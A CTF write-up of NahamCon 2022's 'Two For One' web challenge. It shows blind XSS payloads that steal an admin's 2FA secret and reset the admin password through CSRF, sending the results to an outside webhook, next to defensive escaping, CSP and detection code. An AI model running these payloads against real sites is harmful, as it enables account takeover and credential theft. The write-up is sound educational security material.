# NahamCon CTF 2022 - Two For One
category: Web - Hard
## solution
The first page has a login form and a signup form.

On the signup page we have to get the Google Authenticator token, because we need it for login and other steps.
After logging in we can see that we are able to create secrets.

But the goal is not creating notes; we have to somehow read the admin's notes.
So we go to settings.
In settings we can see a Feedback section, which after some fuzzing we found is vulnerable to blind XSS.
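The Feedback section is the root cause of the chain described on this page: whatever a user submits there is later shown to the admin. The following is an added example, not the challenge's code, of the vulnerable rendering next to a hardened one. The entry shape (`id`, `user`, `text`), the sample submissions and the `renderFeedback*` names are assumptions made for this example.

```javascript
// Added example, not the challenge's code: the Feedback entries are rendered for
// the admin, so anything the page echoes back must be HTML-escaped. The entry
// shape is assumed; the sample entries below are constructed for this example.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: untrusted text is concatenated straight into markup,
// which is what lets a submitted <script> run in the admin's browser.
function renderFeedbackUnsafe(entries) {
  return entries.map((e) => `<li><b>${e.user}</b>: ${e.text}</li>`).join('');
}

// Hardened rendering: every untrusted field goes through escapeHtml, so the
// same submission is displayed as text. Attribute values get the same treatment.
function renderFeedbackSafe(entries) {
  return entries
    .map((e) => `<li data-id="${escapeHtml(e.id)}"><b>${escapeHtml(e.user)}</b>: ${escapeHtml(e.text)}</li>`)
    .join('');
}

// Defence in depth for the page that shows feedback: a CSP without 'unsafe-inline'
// keeps an inline <script> from running even if an escaping gap remains.
const FEEDBACK_PAGE_CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Constructed sample submissions, one of them carrying markup.
const SAMPLE_FEEDBACK = [
  { id: 1, user: 'alice', text: 'Great site!' },
  { id: 2, user: 'mallory"', text: '<script>alert(1)</script>' },
];

// Detection helper for tests and log review: does rendered HTML still contain
// anything a browser would execute?
function containsActiveMarkup(html) {
  return /<script|on\w+=|javascript:/i.test(html);
}
```

Running `renderFeedbackUnsafe(SAMPLE_FEEDBACK)` yields a live `<script>` element; `renderFeedbackSafe` turns the same entry into `&lt;script&gt;...`, and `FEEDBACK_PAGE_CSP` is the header value that should accompany the admin page that lists feedback.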

But there are two more parts in settings:
## reset password

and
## reset 2FA

We found there is no CSRF protection on reset password and reset 2FA, but reset password requires confirming the 2FA code. So first of all we have to somehow hijack the Google Authenticator token.
We can reset the Google Authenticator secret with a POST request to the endpoint `/reset2fa`.
I wrote the payload below to hijack the response of `/reset2fa` and send it to our webhook:
```html
<script>
// synchronous POST from the victim's browser, so the admin's session cookie is sent
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://challenge.nahamcon.com:31170/reset2fa', false);
xhr.send();
// forward the response body (the new 2FA secret) to our webhook
document.location='https://webhook.site/x4xx4-xxx-xxx-xxxx-xxxx?otp='+xhr.response;
</script>
```
## result

Now we have the secret token. We have to convert it to a QR code.

Got it and scanned it with my phone; now I have the Google Authenticator code.
The next step is resetting the admin password.
I wrote the payload below to reset the admin password:
```html
<script>
// same synchronous POST trick, now with the OTP taken from our enrolled authenticator
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://challenge.nahamcon.com:31170/reset_password', false);
xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhr.send(JSON.stringify({"otp":"068728","password":"a","password2":"a"}));
// forward the JSON result to our webhook so we know whether it succeeded
document.location='https://webhook.site/3xxx4-xxxx-xxxxxx-xxxxx-xxxxx?res='+xhr.response;
</script>
```
and got `{"success":true}` in my webhook response.
Now I can log in with the admin creds: the username is `admin`, the password is `a` (what we changed it to), plus the Google Authenticator code.
Logged in, and we are able to read the flag from the admin's secrets.

Really interesting challenge. Thanks @congon4tor#2334